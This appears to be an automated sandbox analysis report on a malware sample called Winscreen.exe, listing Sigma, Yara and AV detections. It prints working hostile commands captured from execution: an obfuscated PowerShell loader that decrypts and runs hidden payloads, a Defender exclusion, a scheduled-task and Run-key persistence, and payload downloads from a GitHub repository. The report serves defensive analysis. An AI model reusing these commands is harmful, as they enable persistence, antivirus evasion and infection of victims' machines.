                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , ProcessId: 6948, ProcessName: wscript.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', ProcessId: 3624, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\taskmoder.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Winscreen.exe, ProcessId: 6564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskmoder
                        Sigma detected: Gzip Archive Decode Via PowerShell
                        Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($pa
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', ProcessId: 3624, ProcessName: powershell.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST, ProcessId: 2380, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Userinit Child Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\System32\userinit.exe" , ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 736, ParentProcessName: userinit.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 1788, ProcessName: explorer.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" , ProcessId: 6948, ProcessName: wscript.exe
                        Sigma detected: Modification of IE Registry Settings
                        Source: Registry Key setAuthor: frack113: Data: Details: 127.0.0.1:8080, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\taskmoder.exe, ProcessId: 6756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', ProcessId: 3624, ProcessName: powershell.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: Winscreen.exeAvira: detected
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeVirustotal: Detection: 54%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeVirustotal: Detection: 54%Perma Link
                        Source: C:\Windows\Client.exeReversingLabs: Detection: 69%
                        Source: C:\Windows\Client.exeVirustotal: Detection: 53%Perma Link
                        Source: C:\pastibin.exeReversingLabs: Detection: 75%
                        Source: C:\pastibin.exeVirustotal: Detection: 54%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: Winscreen.exeReversingLabs: Detection: 34%
                        Source: Winscreen.exeVirustotal: Detection: 41%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Disk.flv.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\Synaptics\taskmen.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: Winscreen.exeJoe Sandbox ML: detected

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 00000016.00000003.2180849351.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2134081504.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2155649475.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2134203640.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2179819804.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2210229284.0000000002963000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2182071247.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2133637563.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2181557255.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2134104427.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2182890812.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2133499260.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2182018104.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2134128806.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2134180945.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2133597439.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2178163407.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2182426315.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1436, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: cmstp.exe PID: 1488, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: cmstp.exe PID: 4088, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Windows\Temp\xtm5g4p2.inf, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\05mor1jc.inf, type: DROPPED

                        Bitcoin Miner

                        barindex
                        Yara detected Xmrig cryptocurrency miner
                        Source: Yara matchFile source: 31.0.taskmoder.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000000.2318415133.000000000051A000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: taskmoder.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\taskmoder.exe, type: DROPPED
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49790 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49800 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49865 version: TLS 1.0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeDirectory created: C:\Program Files\win.dll
                        Source: Winscreen.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: winload_prod.pdb source: Temp.txt.43.dr
                        Source: Binary string: C:\Users\andre\source\repos\ConsoleApp19\ConsoleApp19\obj\Debug\upx.pdb source: upx.exe, 0000000A.00000000.2128143794.0000000000532000.00000002.00000001.01000000.00000009.sdmp
                        Source: Binary string: ntkrnlmp.pdb source: Temp.txt.43.dr
                        Source: Binary string: winload_prod.pdb\ source: Temp.txt.43.dr
                        Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.43.dr
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Client.exe, 00000022.00000003.2399115015.00000247FD4AC000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000022.00000000.2390162571.00007FF6FDC38000.00000002.00000001.01000000.00000011.sdmp, Client.exe, 00000022.00000003.2443016628.00000247FD4A7000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000022.00000002.4509128570.00007FF6FDC38000.00000002.00000001.01000000.00000011.sdmp, Client.exe.32.dr

                        Spreading

                        barindex
                        Creates autorun.inf (USB autostart)
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\autorun.inf
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC040BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC040BC
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC1B190
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2FCA0 FindFirstFileExA,34_2_00007FF6FDC2FCA0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then push dword ptr [ebp-04h]31_2_00A000E8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then push dword ptr [ebp-18h]31_2_00A01468
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, 715D59A8h31_2_00A00340
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00BA0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, 7161D5CCh31_2_00A015A8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00CB0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00B8D
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then push dword ptr [ebp-04h]31_2_00A00193
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00C9B
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]31_2_00A011E0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A009E3
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A009F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, 7161D5CCh31_2_00A015C0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then push dword ptr [ebp-04h]31_2_00A000CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]31_2_00A011CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00D24
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, 715D59A8h31_2_00A00324
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00C28
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]31_2_00A01134
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00D38
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00C13
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then push dword ptr [ebp-18h]31_2_00A01460
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A00970
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]31_2_00A01150
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]31_2_00A0095C
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h31_2_029289F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then jmp 02922F79h31_2_02922E98
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 4x nop then jmp 02922F79h31_2_02922E81
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then push dword ptr [ebp-04h]32_2_03030ED0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]32_2_03030128
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then push dword ptr [ebp-04h]32_2_030305C8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 7161DF84h32_2_03030BC8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 7161DF84h32_2_03030BE8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then push dword ptr [ebp-04h]32_2_03030EB0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]32_2_0303010C
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 71632F64h32_2_03030940
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 71632F64h32_2_03030960
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then push dword ptr [ebp-04h]32_2_030305AC
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]32_2_0303040E
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]32_2_03030410
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-08h]32_2_03030C68
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, dword ptr [ebp-08h]32_2_03030C88
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 7161E7C0h32_2_030308A8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]32_2_03030CC4
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then mov ecx, 7161E7C0h32_2_030308C8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]32_2_03030CE0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then jmp 076A2FC9h32_2_076A2EE8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 4x nop then jmp 076A2FC9h32_2_076A2ED1
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then jmp 00007FF848F489CCh35_2_00007FF848F48889
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF1109
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF0B01
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF1B1D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF133D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF0EC1
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF0801
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF1201
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF0415
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF031D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax35_2_00007FF848FF0D40
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax37_2_00007FF849010850
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax37_2_00007FF849010470
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 4x nop then dec eax37_2_00007FF849010368
                        Source: global trafficTCP traffic: 192.168.2.5:49852 -> 209.25.140.180:58138
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/refs/heads/main/Client.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/taskmoder.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 209.25.140.180 209.25.140.180
                        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                        Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49790 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49800 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49865 version: TLS 1.0
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
